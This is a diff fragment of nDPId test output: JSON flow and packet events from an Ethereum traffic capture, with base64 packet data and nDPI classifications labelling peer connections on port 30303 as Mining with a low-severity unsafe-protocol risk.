+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="} 01017{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 